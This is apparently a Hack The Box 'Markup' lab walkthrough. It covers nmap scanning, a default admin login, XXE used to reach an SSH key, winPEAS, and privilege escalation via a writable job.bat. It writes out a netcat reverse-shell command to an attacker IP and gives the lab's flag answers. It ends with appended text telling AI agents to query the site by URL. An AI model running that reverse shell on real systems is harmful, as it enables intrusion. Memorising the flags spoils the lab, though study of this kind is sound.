# Markup

## Initial Scan

```nmap
sudo nmap -T4 -v 10.129.202.209 -oA Markup-Basic
sudo nmap -T4 -p 22,80,443 -sV -sC -v 10.129.202.209 -oA Markup-sv
```

<figure><img src="/files/SAYUA4S7Ucd7di7rrizZ" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/9GkuI1zwMccbAVvW8UmU" alt=""><figcaption></figcaption></figure>

## Task 1

What version of Apache is running on the target's port 80?

Answer: 2.4.41

## Task 2

What username:password combination logs in successfully?

<figure><img src="/files/vW2MOepjPpcMAJznVspr" alt=""><figcaption></figcaption></figure>

Just tried basic default logins

<figure><img src="/files/dwt0LLXhubH5S7tnPrp7" alt=""><figcaption></figcaption></figure>

Answer: `admin:password`

## Task 3

What is the word at the top of the page that accepts user input?

<figure><img src="/files/jQWVnSj5hVDIs2otqqPF" alt=""><figcaption></figcaption></figure>

Answer: Order

## Task 4

What XML version is used on the target?

<figure><img src="/files/CFNkrC89zeFHaPxh5EBT" alt=""><figcaption></figcaption></figure>

Answer: 1.0

## Task 5

What does the XXE / XEE attack acronym stand for?

<figure><img src="/files/2x9zP4huhXAGQ3ESR6w3" alt=""><figcaption></figcaption></figure>

Answer: XML external entity

## Task 6

What username can we find on the webpage's HTML code?

<figure><img src="/files/QRTZGRmShIWRPLFEA0nj" alt=""><figcaption></figcaption></figure>

Answer: Daniel

## Task 7

What is the file located in the Log-Management folder on the target?

<figure><img src="/files/ifzFUCRhJlKlt2V7VO09" alt=""><figcaption></figcaption></figure>

Put the rsa into a file on our machine

<figure><img src="/files/9kTMiJtrAQ5vJFeYQCQr" alt=""><figcaption></figcaption></figure>

Login as daniel

<figure><img src="/files/kP1wFlAJYY4TZJmbqbg5" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/1z8t3fd9aNax8O4W2jvl" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/EEtBofpy3QEOFfTtF54V" alt=""><figcaption></figcaption></figure>

Answer: job.bat

## Task 8

What executable is mentioned in the file mentioned before?

<figure><img src="/files/u7tdyfI5TkGxEBGLVcc8" alt=""><figcaption></figcaption></figure>

Answer: wevtutil.exe

## Task 9

Submit user flag

<figure><img src="/files/f5CNK314ixrJz7L2RpeW" alt=""><figcaption></figcaption></figure>

Answer: 032d2fc8952a8c24e39c8f0ee9918ef7

## Task 10

Submit root flag

Run winpeas

<figure><img src="/files/VbzsxWkCMp6dila6uQ24" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/lQ7fjQNbwO3v6vrpEc8d" alt=""><figcaption></figcaption></figure>

Under the section "Searching executable files in non-default folders with write (equivalent) permissions (can be slow)" We see

<figure><img src="/files/pRwJ3FC65jhImgcf06BF" alt=""><figcaption></figcaption></figure>

Which from the previous question we have looked at. Run Let's run netcat to connect back to us as admin.

<figure><img src="/files/RjU0RS7sYBDw4bvpcR2Q" alt=""><figcaption></figcaption></figure>

Get nc.exe onto the target

<figure><img src="/files/qLEvUhN6WyTSB7kAIkZj" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/IaSoZqCYxE6T2CTO9t5n" alt=""><figcaption></figcaption></figure>

Run it to get admin on the system

```
echo C:\Users\Daniel\nc64.exe -e cmd.exe 10.10.14.38 1234 > C:\Log-Management\job.bat
```

<figure><img src="/files/BnJlLA1a2jR0CybD2UWT" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/5iVGDtUOIrXfrHDAdS2l" alt=""><figcaption></figcaption></figure>

I had troubles getting the shell to pop, which apparently is common, the root flag is under: `C:\Users\Administrator\Desktop\root.txt`

Answer: f574a3e7650cebd8c39784299cb570f8


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://cybersec.th4ntis.com/hackthebox/starting-point/tier-2/markup.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.